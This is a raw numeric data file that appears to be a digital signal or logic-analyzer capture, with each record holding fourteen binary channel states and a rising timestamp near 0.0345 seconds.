0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4564804e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4564828e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4564852e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4564876e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4564900e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4564924e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4564952e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4564976e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4565004e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4565028e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4565052e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4565076e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4565100e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4565124e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4565152e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4565176e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4565204e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4565224e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4565248e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4565276e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4565300e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4565324e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4565348e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4565376e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4565400e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4565424e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4565428e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.4565448e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4565476e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.4565500e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4565524e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.4565548e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4565576e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.4565600e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4565624e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.4565648e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4565676e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.4565700e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4565724e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4565732e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4565748e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4565776e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4565800e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4565824e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4565848e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4565876e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4565900e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4565924e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4565948e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4565976e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4566000e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4566024e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4566048e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4566076e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4566100e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4566124e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4566148e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4566176e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4566200e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4566224e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4566252e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4566276e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4566300e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4566324e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4566352e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4566376e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4566404e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4566428e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4566452e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4566476e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4566500e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4566524e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4566552e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4566576e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4566604e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4566628e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4566652e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4566676e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4566700e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4566724e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4566752e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4566776e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4566804e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4566836e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4566864e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4566888e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4566916e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4566940e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.4691916e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.4692148e-02 1,1,1,0,1,0,0,0,0,0,0,1,0,1,3.4692180e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.4692204e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,3.4692504e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.4692532e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,3.4692556e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.4692580e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,3.4692604e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.4692628e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,3.4692652e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.4692680e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,3.4692704e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.4692732e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,3.4692756e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.4692780e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,1,3.4692804e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4692812e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4692828e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4692852e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4692880e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4692904e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4692932e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4692956e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4692980e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4693004e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4693028e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4693052e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4693080e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4693104e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4693132e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4693156e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4693180e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4693204e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4693228e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4693252e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4693280e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4693304e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4693332e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4693356e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4693380e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4693404e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4693428e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4693452e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4693480e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4693504e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4693532e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4693556e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4693580e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4693604e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4693628e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4693652e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4693676e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4693704e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4693732e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4693756e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4693780e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4693828e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4693852e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4693880e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4693904e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4693956e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4693980e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4694028e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4694052e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4694104e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4694132e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4694180e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4694204e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4694252e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4694280e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4694332e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4694356e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4694380e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4694404e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4694428e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4694452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4694480e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4694504e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4694532e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4694556e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4694580e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4694604e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4694628e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4694652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4694680e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4694704e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4694728e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4694756e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4694804e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4694828e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4694852e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4694880e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4694904e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4694932e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4694956e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4694980e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695004e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4695028e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695052e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4695080e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695104e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4695132e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695156e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4695180e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695204e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4695228e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695252e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4695280e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695304e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4695332e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695380e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4695404e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695428e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4695452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695480e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4695504e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695532e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4695556e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695580e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4695604e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695628e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4695652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695680e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4695704e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695732e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4695756e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695780e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4695804e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695828e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4695852e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695880e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4695904e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695932e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4695956e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4695980e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696004e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696028e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696052e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696080e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696104e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696132e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696156e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696180e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696204e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696228e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696252e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696280e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696300e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696328e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696356e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696380e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696404e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696428e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696476e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696500e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696524e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696556e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696576e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696604e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696628e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696676e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696700e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696724e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696752e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696776e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696804e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696828e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696852e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696876e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696900e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696924e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4696952e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4696976e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697004e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697028e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697052e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697076e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697100e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697124e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697152e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697176e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697204e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697228e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697252e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697276e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697300e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697324e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697352e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697376e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697404e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697428e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697476e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697500e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697524e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697552e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697576e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697604e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697628e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697676e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697700e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697724e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697752e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697776e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697804e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697828e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697852e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697876e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697900e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697924e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4697952e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4697976e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698004e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698028e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698052e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698076e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698100e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698124e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698152e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698176e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698204e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698228e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698252e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698276e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698300e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698324e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698352e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698376e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698404e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698428e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698476e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698500e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698524e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698552e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698576e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698604e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698628e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698676e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698700e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698724e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698752e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698776e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698804e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698828e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698852e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698876e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698900e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698924e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4698952e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4698976e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4699004e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4699028e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4699052e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4699076e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4699100e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,3.4823884e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,1,3.4824108e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,3.4824112e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.4824132e-02 0,0,0,1,1,0,0,0,0,0,0,1,0,1,3.4824152e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.4824180e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,3.4824460e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.4824488e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,3.4824516e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.4824540e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,3.4824564e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.4824588e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,3.4824612e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.4824636e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,3.4824660e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,3.4824684e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,3.4824712e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4824716e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4824736e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4824764e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4824788e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4824812e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4824836e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4824860e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4824884e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4824912e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4824936e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4824964e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4824988e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4825012e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4825036e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4825060e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4825084e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4825112e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4825136e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4825164e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4825188e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4825212e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4825236e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4825260e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4825284e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4825312e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4825336e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4825364e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4825388e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4825412e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4825436e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4825460e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4825484e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4825512e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4825536e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4825564e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4825588e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4825612e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,3.4825636e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,3.4825660e-02 